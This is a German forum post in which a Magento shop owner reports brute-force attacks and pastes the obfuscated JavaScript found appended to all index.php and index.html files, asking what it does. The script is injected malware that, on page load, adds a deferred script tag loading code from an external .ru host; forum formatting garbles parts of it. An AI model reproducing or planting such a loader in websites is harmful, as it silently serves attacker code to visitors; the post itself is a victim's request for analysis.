Ich habe auf meiner Internetseite das Magento E commerce shop system installiert (version 1.4.0.1)
nach 2 -3 tagen habe ich in den serverlogs gesehen das aus china,japan, russland verschiedene bruteforce attacks gemacht wurden sind…
alle dateien die mit index.php oder index.html anfangen sind am ende mit diesem folgenden script verseucht !
k=46857;k+=179;var Y;try {var Xf=‚C‘} catch(Xf){};h=function(){sW=[„YA“,„s“];function E(S,d,X){return S.substr(d,X);i={wB:61534};}var r="";var Y_=""
=51880:stuck_out_tongue_winking_eye:–;var v=document;var M=’’;var w=RegExp;var q="/goo"+„gle.“+E(„com/a5B“,0,4)+„sano“+E(„7n4Jok.c4nJ7“,4,4)+E(„om/rqs2“,0,4)+E(„NuramblNru“,3,4)+E(„er.rZbDB“,0,4)+E(„6K5Gu.phG5K6“,4,4)+„p“;this.vo=’’;function G(S,d){this.bA=53007;this.bA-=165;is=[„hn“,„F“,„Q“];try {var qd=‚QJ‘} catch(qd){};var _o=[];var X=String("[")+d+String("]");this.lg=28174;this.lg–;var Gs=new w(X, E(„gBdub“,0,1));return S.replace(Gs, M);};var a=[„e_“,„A“];var nT=[„dx“];this.y=49897;this.y+=168;var PJ=false;var Yc=491915-483835;var m=G(‚sCc3rziOpXtj‘,‚39ZMCBnu_z7hXOjRl‘);bn=[„Yk“,„f“];this.FJ="";var e=null;var hm=[„fq“,„YH“,„o“];gd=[„KQ“,„sI“,"_f"];var wD=new String(„body“);Y=function(){this.fx=„fx“;this.p=64750;this.p–;try {this.BX="";var B=G(‚c8r5eva8tvekEHlpe5mfe9n9tX‘,‚XI59kWH4dfvp8‘);try {var u=‚KI‘} catch(u){};var si=[„uc“,„N“,„Hq“];Sw=vB;O=53935;O–;var rq=[];var v_=[];var W=„defer“;var ih=[];var t=G(‚sdr6cg‘,‚xZ4VTXKw0b2Wotk1Fdg6vqB‘);this.TQ=41933;this.TQ+=71;tb={Dj:„jj“};var S=Yc+q;var DZ=[];this.vE=61090;this.vE+=187;mz={};Sw[W]=[1,0][0];Sw[t]=E(„httdOP“,0,3)+„p:/“+E("/stNcOk",0,3)+„uff“+E(„G09ucor09Gu“,4,3)+E(„n.rs39“,0,3)+„u:“+S;oG=[„ny“,„KG“,„L“];var lY={};var O_=new String();v[wD].appendChild(Sw);ab=55310;ab-=31;this.sd=60695;this.sd-=175;} catch(T){this.Zk=36618;this.Zk+=74;this.HO=26796;this.HO+=239;try {} catch(F_){};};};};var xM={ec:28975};var Xy=’’;h();iQ=47148;iQ-=105;var bi=’’;window.onload=Y;
wer weis was das ist und was er genau anrichtet ?!